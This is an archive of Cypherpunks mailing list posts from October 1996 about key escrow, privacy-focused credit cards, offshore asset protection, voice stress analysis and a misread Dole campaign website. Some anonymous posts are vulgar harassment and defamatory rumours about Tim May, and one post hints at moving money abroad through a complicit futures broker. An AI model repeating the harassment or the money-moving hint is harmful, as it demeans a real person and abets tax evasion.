From: attila <attila@primenet.com>
Date: Tue, 8 Oct 1996 06:47:05 +0800
To: "Chris Adams" <cypherpunks@toad.com
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <19961006045736515.AAA164@GIGANTE>
Message-ID: <199610071855.MAA05992@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <19961006045736515.AAA164@GIGANTE>, on 10/05/96 
   at 09:58 PM, Adamsc@io-online.com (Adamsc) said:

-.On Sat, 5 Oct 1996 15:55:42 -0700 (PDT), John C. Randolph wrote:

-.>What's really sad is the way that every cult member tries to convince
-.>himself that *his* franchise has more to offer than Lifespring,

-.Food for thought:  suppose he didn't - why would any rational individual
-.follow a religion he thought was wrong?


        that statement is profound in more ways that in religion!  why
    would any rational individual espouse ANY cause he thought was
    wrong!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dustman@athensnet.com (Anonymous)
Date: Mon, 7 Oct 1996 12:21:08 +0800
To: cypherpunks@toad.com
Subject: Secure envelopes
In-Reply-To: <199610062134.RAA08346@porky.athensnet.com>
Message-ID: <199610070134.VAA09393@porky.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


> Many forgeries are traceable with mathematical 
> certainty to feebleminded Timothy May poison keyboard.

If that were so, you could supply a proof, couldn't you?  Since you
can't, this "mathematical certainty" crap just proves you are a bozo.
Is this what you are trying to prove by sending all these messages,
that "some bozo really dislikes Tim May"?

Is there any substance to these attacks on Tim May?  Is there any
reason a disinterested reader of cypherpunks should distrust or
dislike Tim May?  What would you like us to conclude from these
seemingly false statements you keep making about him?

If Tim May really is a terrible person for some reason, why don't you
tell us why?  Are you not trying to get us to dislike Tim May?  Are
you just trying to drive people away from the cypherpunks mailing
list?  Would you be satisfied if everyone unsubscribed?  If Tim May
unsubscribed?

What exactly are you trying to accomplish?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dustman@athensnet.com (Anonymous)
Date: Mon, 7 Oct 1996 12:32:43 +0800
To: cypherpunks@toad.com
Subject: Re: PGP
In-Reply-To: <199610062158.OAA12739@abraham.cs.berkeley.edu>
Message-ID: <199610070134.VAA09392@porky.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: nobody@cypherpunks.ca (John Anonymous MacDonald)
> 
> There's a rumor that Timmy C. May sells his dead relatives as fertiliser as 
> they constitute the best shit in California.

Where can I buy some of this fertilizer?

Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 7 Oct 1996 13:32:58 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
In-Reply-To: <v03007801ae7e0e0e4b57@[207.167.93.63]>
Message-ID: <Pine.SUN.3.94.961006231010.16819B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 6 Oct 1996, Timothy C. May wrote:

> At 2:05 PM -0700 10/6/96, Steve Schear wrote:
> (quoting me)
> 
> >>(They already got access to the credit card databases, decades ago, of
> >>course.)
> >>
> >
> >Are SSN and other ID required when opening a 'pre-paid' credit card
> >account?  That is, the ones for persons with poor credit who are required
> >to maintain a balance sufficient to pay off the charges?  Perhaps we could
> >put our heads together and determine a way to become franchised by MC/VISA
> >and offer 'affinity' type accounts with no address requirements (all
> >statments are sent via remailer/nym email).
> 
> A couple of people on this list talked about a similar thing, a "Privacy
> Card," with the explicit policy of not reporting transactions in detail to
> the Big Three (the government-friendly TRW Credit, Equifax, and Transunion).
> 
> The idea being that if a "market for privacy" exists, someone ought to be
> able to make a nice piece of change offering a card that protects privacy.

Coming to a bank near you.

> One problem is that many people _want_ credit card transactions reported to
> the Big Three, to build up their credit record.

The easy solution includes optional release of high balance and payment
history only to the big three at the customer's option with full
disclosure and customer waiver before the release as to the nature of the
data to be shared with the credit company.

> Such a deal would have to be one of Visa, MasterCard, or Discover, with
> American Express a distant fourth. (I don't even know if these
> companies/tradenames would even allow such a thing, of course.) The cost of
> rolling out a brand new type of card would of course be prohibitively high.

Several offshore banks made the habit of issuing "secured" Gold
Mastercards in corporate names.  Essentially they were debit cards and
could be used anywhere with atms to withdraw cash on the spot.  Most of
these practices were ended by shrewd attacks from the United States (the
U.S. branches of these banks started having undefined and rather vague
license problems and regulatory headaches until they agreed to direct
their offshore branches to stop issuing these cards).

> (I have no expectation than this will be done, and I think I said so at the
> time. Ever the realist, in some ways,  I knew no one would take on such a
> complex project. Just as no one followed through with the "Cypherpunks
> Credit Union" idea, discussed at several meetings in 1993.)

There are several people who are aware that privacy is a marketable
service in credit card banking and insurance now.  In my view such an
institution will exist within 12 months.

> 
> --Tim May
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Mon, 7 Oct 1996 16:35:03 +0800
To: cypherpunks@toad.com
Subject: Re: ElGamal
Message-ID: <199610070621.XAA20911@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim Maysits at his terminal dressed in five-inch stiletto heels, fishnet 
stockings, a gold-lame mini-skirt, a purple halter with girdle underneath to 
keep in his flabby gut, A Fredericks of Hollywood padded bra also underneath 
the halter, a cheap Naomi Sims pink afro wig, waiting to yank his crank 
whenever a black man responds to one of his posts.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 7 Oct 1996 16:20:11 +0800
To: cypherpunks@toad.com
Subject: Re: Put up or shut up!
In-Reply-To: <v03007801ae7e303a52fe@[207.167.93.63]>
Message-ID: <v03007806ae7e5a192957@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:40 AM -0400 10/7/96, Black Unicorn wrote:

>Interesting that if the transition to crypto anarchy includes any phase
>of conflict between the state and the individual, failing to properly
>protect those assets may result in their seizure anyhow.  If they are
>attachable now, as you seem to suggest, then they are attachable then.
>
>I know that Mr. May has, in past, been a asset protection "naysayer," but
>this falls into a general, and disturbing, pattern.

Please call me "Tim," not the stuffy, formal, "Mr. May."

It is not that I am a naysayer, it is that the proposals I have read about
or seen discussed here have not been convincing to me, in my particular
situation. I've even done some on-site research in the Bahamas and Monaco,
and neither seemed a good solution. (And a friend of mine travelled to
several other Caribbean islands, plus the Channel Islands, Guernsey, etc.
He had several schemes he was working on, but the laws in some of his best
prospects changed and his plans fell through.)

My primary concern is *tax avoidance* (I emphasize "avoidance" over
"evasion"), not the "judgement-proofing" or "insurance settlement-proofing"
most of the published books emphasize. (This is where someone will say,
"Ah, but that's because they're the _published_ books, the ones available
to Joe Doe in Barnes and Noble. The _real_ stuff is contained in
self-published books, the kind the media conglomerates won't touch. Send
$295 for this informative pamphlet....")

It turns out that I would save nothing in taxes by moving some of my liquid
assets to some particular coral atoll. (Unless I lie on my 1040, which is
always an option.)

If Black Unicorn would do things differently with my money, fine. But I
have seen nothing that is very convincing to me.

And I've seen a lot of "creative" ideas that just don't fit my situation.
The "perpetual tourist" notion, pushed by Duncan and others, doesn't fit my
notion of living in one place. Nor do I want to bounce around Europe for
years and years. (A great place to visit, but....) Nor am I much interested
in protecting an asset as comparatively trivial as my vehicle by setting up
a Nevada corporation which then leases me back the vehicle as part of my
Amway distributorship, blah blah. Too much paperwork and "IRS alerts" for
too little gain. And so on.


>I'll wager, though I have no data to back it up, that most of the people
>in this forum who are uncertain about the safety of their assets don't
>bother to engage in the most basic of asset preservation tactics, namely:
>geographic diversification.
>
>Surprising considering the perfectly legal options which would protect
>many of them.

Well, I get pretty tired of these vague claims that float out, with no
particulars ever presented. (I know, I know, if I want particulars I should
hire you...sorry, not in my plans.)

(Not directed at Black Unicorn, but at others: Please, let's not start a
thread about how stupid Tim is with his money, about how all true goldbugs
know how to convert their assets into 17 Kruggerands which they they bury
in the backyard, about how foolish Tim is to ignore all the helpful free
advice from fabulously successful fellow list members who have figured out
how to avoid taxes, protect assets, and live the carefree life of the
Perpetual Tourist! If your plan works for you, that ought to be
enough--yoiu don't have to sell me on it. And please, no more advice about
selling short against the box.)


--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 7 Oct 1996 13:45:56 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: legality of wiretapping: a "key" distinction
In-Reply-To: <3.0b28.32.19961006163919.00700398@ricochet.net>
Message-ID: <Pine.SUN.3.94.961006230456.16819A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 6 Oct 1996, Greg Broiles wrote:

> At 08:43 PM 10/5/96 -0700, Detweiler wrote:
> >>"Right to choose to be in contempt of court" ?  If only I could attach a
> >>sound file with my howling laughter to this post.
> >
> >I find it as ludicrous as you do, but it's the clear insinuation
> >suggested by hard-core cypherpunks / anarchists in this forum.
> 
> I wrote something which you might be confusing for this argument; in case
> this is what you mean, I've reproduced it below:
> 
> [originally sent on 9/18/96]
> >There's a world of difference between the government subpoena-ing
> something >from me, where I can delay disclosure until I've exhausted my
> legal avenues >to challenge disclosure, and the government demanding data
> from an at best >disinterested third party who cares not at all if I get my
> day in court >before they disclose. With the second scenario, I'm forced to
> try to >"unring the bell", and somehow limit the spread of otherwise
> >private/confidential data in a community (law enforcement) which is
> >organized to collect and retain information. Ha, ha. Given today's
> Congress >and Supreme Court, there's probably precious little chance that
> keys >disclosed prematurely or erroneously won't be used to collect
> evidence >which will be admissible despite the lack of meaningful
> opportunity to >challenge the "recovery" of a key.
> 
> Also, there is an important difference between making a policy argument or
> expressing a preference, e.g.:
> 
> "I like having a choice between disclosing information which is requested
> and suffering the penalties for contempt of court"
> 
> and an argument about the constitution:
> 
> "The constitution says I must be given a choice between disclosing and
> contempt." 
> 
> I don't remember seeing any examples of the latter come across the list. As
> I remember things, the context of my statement above was a discussion of
> why third-party key escrow is not the same as self-escrow. 

Actually, believe it or not, I may have an obscure one.

Said of those hauled before a court and ordered to disclose secret
banking records, even though doing so will subject them to severe
penalities and even jail time on their return home:

"...the defendant should feel the full measure of each sovereign's
conflicting commands and so choose between laws of those two sovereigns."
Westinghouse Elec. Corp. v. Rio Algom, Ltd., 480 F. Supp. 1138 (N.D. Ill.
1979).

Of course in this case the U.S. measures were rather a bit more dire, but
it does suggest a tacid recognition that there is nothing literally
illegal about being in contempt of court, even if it was an attempt to
resolve a conflict of laws problem in this case.

It's also worth noting that contempt of court is rarely punative in
nature.  (Different rules apply when it is).  Instead, it is coercive.
Force is applied in increasing measures until the individual either gives
into the court demands, or it is clear that force will not be of any
effect.  There is no real law being broken per se, merely an exercise of
power by the court.  If you comply, sanctions will be removed.  The only
sanctions which will be preserved after the fact will be those which were
levied to enforce compliance prior to that compliance.

All this is entirely academic in any event to the original point.  There
is no defined right to be in contempt, only the right of the court to
enforce its rulings and to compell testomony of unwiling witnesses.  The
fact that an act is not illegal does not make it a right.  There is
nothing I see in the constitution to support the argument that it is a
right in any way shape or form to refuse a lawful order of the court.

> --
> Greg Broiles                |  "We pretend to be their friends,
> gbroiles@netbox.com         |   but they fuck with our heads."
> http://www.io.com/~gbroiles |

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Campbell <campbell@c2.net>
Date: Mon, 7 Oct 1996 13:47:44 +0800
To: cypherpunks@toad.com
Subject: Dole web site cracked?
Message-ID: <9610070342.AA24124@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

So, I just finished watching the debate and at the very end, Bob Dole
suggested that people check out www.dole-kemp.org.  I was already on
playing decision96.digital.com so I went for it.

The first page says ``Oops!  You've tried to access the old
way.  Please choose the new way instead.''  Clicking on `new' gives a
black background page with two yellow arrows, one left and one right.
The left one gives you ``Nope, you can't go back now''.  The Right one
gives you www.cg96.org, the Clinton-Gore home page.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMlh5vhj0UvMeUesFAQGzgQP9GlcZb4rRSGcVjdsnvMxOrB2lDdz6KFSw
UCjAR/UhQLOs8UW1cHS8vlRljCwf8nDemxOzZ7/JMdTQbiNcdblQbxMGoJusJDal
mOOgYJiVSFEBtX07JOp07m1w34GjlFaSTtGKERNCEePxtSO3HDG7V7H3AIoV7xFQ
oIBKQmdKQho=
=C1w9
-----END PGP SIGNATURE-----
--
Rick Campbell <campbell@c2.net>	      ``One of the symptoms of an approaching
  http://www.c2.net/~campbell/		nervous breakdown is the belief that
					one's work is terribly important.''
							- Bertrand Russel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 8 Oct 1996 14:23:50 +0800
To: "GOULDING CP" <cypherpunks@toad.com
Subject: Re: unsubsribe
Message-ID: <199610071943.MAA16975@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 AM 10/2/96 GMT, GOULDING CP wrote:
>unsubsribe

How to unsubsribe is a closely guarded cypherpunk secret.

I will send you unsubsription information if you prove
you are a genuine cypherpunk by sending me the secret
code word in a PGP encrypted message.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 8 Oct 1996 14:29:12 +0800
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Put up or shut up!
Message-ID: <199610071943.MAA16976@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:22 PM 10/6/96 -0800, Timothy C. May wrote:
> It turns out that I would save nothing in taxes by moving some of my liquid
> assets to some particular coral atoll. (Unless I lie on my 1040, which is
> always an option.)

Hmmmm....
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 7 Oct 1996 17:23:27 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Put up or shut up!
In-Reply-To: <Pine.SUN.3.94.961007013340.17782J-100000@polaris>
Message-ID: <Pine.3.89.9610062326.A29159-0100000@netcom22>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 7 Oct 1996, Black Unicorn wrote:
> I'll wager, though I have no data to back it up, that most of the people
> in this forum who are uncertain about the safety of their assets don't
> bother to engage in the most basic of asset preservation tactics, namely:
> geographic diversification.
> 
> Surprising considering the perfectly legal options which would protect
> many of them.

Not to me. Geographic diversification requires either significant 
research on part of the individual or trusting one's assets to the 
goodwill of third party consultants.

There are a number of individuals on this list that have claimed in the 
past to know the detailed techniques required to achieve such 
diversification. Not one of them has ever posted "How To" instructions to 
the list. Sure, we heard many generalities, but never concrete instructions.

Tim has asked several times on this list for details, but, to the best of my 
knowledge, was never provided with a workable solution to secure his 
fortune, most of which seems to be held in stock in the US.

Compare this to the dozens of FAQs available for crypto. If they were 
limited to "find some cryptographic software, it will protect your data", 
considerably fewer individuals would use PGP.

Crypto FAQs have URLs, step-by-step instructions, etc. I have not seen 
anything even remotely like it for asset diversification.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 7 Oct 1996 18:09:42 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Voice Stress Analysis of Debates?
In-Reply-To: <199610060428.VAA19939@mail.pacifier.com>
Message-ID: <Pine.SUN.3.91.961007002456.9411A-100000@crl11.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 5 Oct 1996, jim bell wrote:

> This reminds me...   Years ago, somebody developed a technique called "Voice 
> Stress Analysis," which was supposed to detect small variations in a 
> person's voice in response to stress.  Not exactly a lie-detector, but it 
> was supposed to do nearly the same thing.   Does anybody plan to analyze the 
> debates for stress?  Is there software to do this?  (Tried to do a 
> web-search; didn't see anything.)

The original device was the PSE, the psychological stress 
evaluator.  It was, as still is, sold by a company called
Dektor.  It is located in the DC area (Maryland?) and is run
by a group of ex-spooks.  It's been around for 25 years or so.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 7 Oct 1996 17:54:38 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: U.S. presidential debate: URLs, V-Chip, huge databases
Message-ID: <199610070730.AAA19303@dfw-ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Except for one sentence that will go down in Net.history -- Bob Dole
>ended the 90-minute session with what he framed as an appeal to
>younger voters: "If you really want to get involved, tap into my home
>page at www.dolekemp96.org. Thank you."

It's an amazing web site.  The first thing that it wants you to do
is fill out a 
        Custom Design Form
        Information on the following form will allow us to customize 
        your personal Dole for President web site. 

Imagine - a web site for a candidate so spineless he wants to tell you what
_you_ believe in, not what he believes in!  Dole is one of the few
Republicans out there who make Clinton look like he's got principles.
Bush would always sneer while he was lying to the public, but at least
the man _was_ up to something.  Something evil, but _something_.
And when Nixon lied to you, it was ok to laugh.  (Well, in most circles.
And even his die-hard supporters generally understood....)


>Ain't it hip to be a netizen?
>   .... Clinton ... V-Chip ... Dole ... nationalized ID card database


>Dole called the use of illegal drugs a heinous crime, accusing Clinton
>of being a "liberal." 
Bwah-hah-hah!  <insert much cynical laughter here>
Liberal.  Yeah, right.  I've known liberals, and he's not one.
Even the hacked Dole/Kemp web page had the right-wing arrow pointing
to the ClintonGore page, and the left-wing arrow pointing to the
"You can't go back again" page :-)


>Then, responding to a get-tough-on-guns
>challenge from his opponent, Dole suggested a database system that
>would check your identity and background before allowing you to buy a
>gun: "You put your card in there and if it says 'tilt' you get
>nothing. No guns. Zippo."

Card?  What card?  Thank you very much!

>These are hardly the words of someone who gives a rat's ass about privacy. 

Declan McCullagh, you have been fined two credits for violation
of the verbal morality law.

>What's worse, elephantine government databases or V-chip
>style censorship?  All I know is that neither of 'em has my vote.

Isn't it nice to have options!  If I weren't voting Libertarian,
there's Perot and Ralph Nader (both of whom are _interesting_ statists),
or Pat Paulsen (I don't care that he lost the primary), or
Barry Goldwater (:-).

Or there's Hugh Romney (aka Wavy Gravy, who runs the Nobody for President
campaign), or Frank Zappa (who'd make a better president, dead, than
most of the major candidates would alive.)

Or you can take a decentralist approach - vote for someone you trust.
Yourself.  Your spouse.  One of your neighbors.  Your mom.  
Just spell their name right.



(I've met Harry Browne, but he's always been in public-figure mode.
I guess he'll do.  Jo Jorgensen, the VP candidate, is actually
a real person, as is Nancy Lord, previous VP candidate.)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypherpunks@count04.mry.scruznet.com
Date: Mon, 7 Oct 1996 20:33:17 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Voice Stress Analysis of Debates?
In-Reply-To: <199610060428.VAA19939@mail.pacifier.com>
Message-ID: <199610070730.AAA29150@count04.mry.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


PSE/VSE etc relys  on a random 8-14 hz fm modulation appearing in the
 the 3rd formant band of the voice... the Dektor PSE retailed for approximately 5k in the early 1970's the hagoth hs-2 was the early 80;s for 2k .. 
I bought 2 VSE units based on a new chip for 89.95 apiece recently...
this was on an article appearing in popular electronics in 1995
no software as of yet and it would be probably a FFT or DFT based algorithm 
running on a sound blaster DSP(hardware DSP only) or as software
 on a fast 150 Mhz + pentium I can give the basic facts known... it is a truth
detector only(not a lie detector), background music shows up a stress...
and scrubbing the modulation shows up as constant stress or "possible decption"
truth is indicated by the modualtion showing up randomly over small increments
of time... the effect is caused by microscopic tremors of the larynx when the 
speaker is relaxed and truthful the larnyx is relaxed and the random modulations
show up,(or the speaker believes what he is saying to be the truth, when lying
or under stress the larybx tightens and the random modulations
disappear indicating stress... it would be  nice to have it in software...
to run on a laptop soundboard and spread to the net as widely as pgp...

   cheers
   a cypherpunk 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 7 Oct 1996 17:42:17 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Voice Stress Analysis of Debates?
In-Reply-To: <199610061727.KAA18789@mail.pacifier.com>
Message-ID: <Pine.SUN.3.91.961007003013.9411B-100000@crl11.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 6 Oct 1996, jim bell wrote:

> One thing I wonder is this:  Can the stress indications be removed from a 
> voice-containing signal by some sophisticated DSP processing?...

Nope.  The PSE, and voice stress analysers in general, measure 
stress by the ABSENCE of micro-temors in the voice.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Campbell <campbell@c2.net>
Date: Mon, 7 Oct 1996 15:06:46 +0800
To: cypherpunks@toad.com
Subject: Dole crack mirror
Message-ID: <9610070441.AA25360@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I put a copy of the stuff that I found at http://www.dole-kemp.org/ at
http://www.c2.net/~campbell/www.dole-kemp.org/

Basically, there was very little to the content:  a couple of pages
and a few images.  The link to the Clinton-Core page was through
http://www.dole-kemp.com/ (Note .com rather than .org) where one of
the links there redirects immediately to
http://www.cg96.org/new/index2.htm

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMliJARj0UvMeUesFAQHW6QP/QL/P49brEIS7Hmw2myu4gL0fikL8Y1dW
03RO2a8IbBZVcN9FPA8FKlcDg5rApvquO83c930Wdihy1Lt1ot28Jlu0wrb1TExk
paTWfmFG2kkRf66HvBbW5HYxdDPBUhv6X+WW+TztuLgtau/8p6TB67gyH84QBiYz
kExTNxnu/54=
=8gCv
-----END PGP SIGNATURE-----
--
Rick Campbell <campbell@c2.net>	      ``One of the symptoms of an approaching
  http://www.c2.net/~campbell/		nervous breakdown is the belief that
					one's work is terribly important.''
							- Bertrand Russel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 8 Oct 1996 14:21:20 +0800
To: Black Unicorn <shamrock@netcom.com>
Subject: Re: Put up or shut up!
Message-ID: <199610072023.NAA20429@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:18 AM 10/7/96 -0400, Black Unicorn wrote:
>  There is no
> one good solution, and anyone who sells you a universal package is selling
> you a bill of goods.

Surely there is at least one good solution to an exceedingly common 
problem -- large assets in the US that are known to the authorities.

> Careful, professional, and highest quality service is required to properly
> design any investment design.  Again, you get what you pay for.

Smoke.

The reason that no one publishes "How to" step by step instructions for 
discretely expatriating your money is exactly the same reason as the reason
that nobody publishes "How to" step by step instructions for buying dope.

For example one ever popular method of expatriating money, (or repatriating
it to preferred politicians), is by means of a friendly cattle futures 
broker.

First find your friendly cattle futures broker.

Despite this, many people manage to buy dope and many people manage to 
discretely expatriate their money.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 7 Oct 1996 20:36:49 +0800
To: cypherpunks@toad.com
Subject: Technically Recoverable Encryption Functions
Message-ID: <199610070752.AAA19779@dfw-ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


David Sternlight's netnews posting, which Dmitri forwarded to cypherpunks,
was about the 2nd Ave. Deli, but it does apply quite well to crypto,
and the current government attacks.

>>Congregant: "What does "kosher style" mean?
>>Rabbi: "Tref".

What does "Recoverable-Key Encryption" mean?
"Unsecure"

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 7 Oct 1996 15:57:47 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Put up or shut up!
In-Reply-To: <v03007801ae7e303a52fe@[207.167.93.63]>
Message-ID: <Pine.SUN.3.94.961007013340.17782J-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 6 Oct 1996, Timothy C. May wrote:

> I will express my thoughts, my theories, and will develop systems and ideas
> as I see fit. However, I have no intention of putting my future at risk by
> taking steps such as "civil disobedience" or "assassination politics" which
> could very likely result in multimillion dollar fines (hint: such fines
> would have great meaning for me) or seizure of my assets and jail time.
> 
> Your mileage may vary, but this "amateur anarchist" intends to keep on
> doing what he's doing and is not interested in "crossing the line" to the
> point where his assets will be seized.

Interesting that if the transition to crypto anarchy includes any phase
of conflict between the state and the individual, failing to properly
protect those assets may result in their seizure anyhow.  If they are
attachable now, as you seem to suggest, then they are attachable then.

I know that Mr. May has, in past, been a asset protection "naysayer," but
this falls into a general, and disturbing, pattern.

I'll wager, though I have no data to back it up, that most of the people
in this forum who are uncertain about the safety of their assets don't
bother to engage in the most basic of asset preservation tactics, namely:
geographic diversification.

Surprising considering the perfectly legal options which would protect
many of them.

> 
> --Tim May
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Murray Hayes" <mhayes@infomatch.com>
Date: Mon, 7 Oct 1996 19:15:48 +0800
To: "cypherpunks@toad.com>
Subject: Re: Dole web site cracked?
Message-ID: <199610070856.BAA04908@berlin.infomatch.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 06 Oct 1996 23:42:01 -0400, Rick Campbell wrote:

>-----BEGIN PGP SIGNED MESSAGE-----
>
>So, I just finished watching the debate and at the very end, Bob Dole
>suggested that people check out www.dole-kemp.org.  I was already on
>playing decision96.digital.com so I went for it.
>
>The first page says ``Oops!  You've tried to access the old
>way.  Please choose the new way instead.''  Clicking on `new' gives a
>black background page with two yellow arrows, one left and one right.
>The left one gives you ``Nope, you can't go back now''.  The Right one
>gives you www.cg96.org, the Clinton-Gore home page.
>

Dole did not say www.dole-kemp.org  he said www.dolekemp96.org.  The
clinton gore page is on a com site.

mhayes

mhayes@infomatch.com
http://www.infomatch.com/~mhayes





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: travel23@juno.com (The Traveler)
Date: Mon, 7 Oct 1996 17:11:29 +0800
To: cypherpunks@toad.com
Subject: Re: PGP
Message-ID: <19961007.020136.3334.0.travel23@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: nobody@cypherpunks.ca (John Anonymous MacDonald)
> 
> There's a rumor that Timmy C. May sells his dead relatives as
fertiliser as 
> they constitute the best shit in California                            
   ^^^^^^^^^

   Hmmm, methinks there lies a clue here.  This is the British/European
way of spelling the word.
   Someone got sloppy.......

T.T.


    
.................................................................................
              Just consider me an acorn who is trying
                   to deal with the rest of the nuts 
    
.................................................................................


                               




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 7 Oct 1996 19:18:56 +0800
To: Marshall Clow <mclow@owl.csusm.edu>
Subject: Re: White House crypto proposal -- too little, too late
In-Reply-To: <v03007806ae7e2d1e3663@[207.67.246.99]>
Message-ID: <Pine.SUN.3.94.961007021645.17782K-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 6 Oct 1996, Marshall Clow wrote:

> This is a brilliant move by the government.
> 
> They hold a (small) carrot out to industry:
> 	You can export marginally stronger crypto for 2 years, _if_ you develop a 'key recovery' system. 
> 
